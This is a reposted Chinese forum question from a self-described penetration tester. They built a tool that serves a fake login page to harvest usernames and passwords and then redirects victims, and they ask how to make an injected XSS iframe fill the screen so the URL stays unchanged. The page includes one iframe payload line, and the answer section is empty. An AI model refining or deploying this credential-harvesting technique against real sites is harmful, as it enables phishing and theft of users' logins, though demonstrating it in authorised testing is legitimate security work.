我正在研究XSS攻击,目的是在客户端演示中使用它们(我是笔测试者).我已经编写了一个工具,它会托管恶意版本的网站的登录页面(收获用户名和密码),然后将受害者重定向到原始网站.不过,我一直在努力使用iframe来使用它,因为它看起来更有说服力,因为url不会改变.
我已经google了,这似乎是适当的代码:
<iframe src="http://192.168.0.1/login.PHP" style="border: 0; width: 100%; height: 100%">
但是创建的iframe绝对不是全屏幕(在Internet Explorer和Firefox上).这是一个截图
如您所见,iframe登录页面位于“您的名字”之下?区域,因此没有附近全屏幕.我已经尝试编辑恶意登录页面的css文件,以包括全屏参数,但是这也没有效果.
有没有人有任何解决方案?谢谢!
解决方法
原文地址:https://www.jb51.cc/html/230293.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
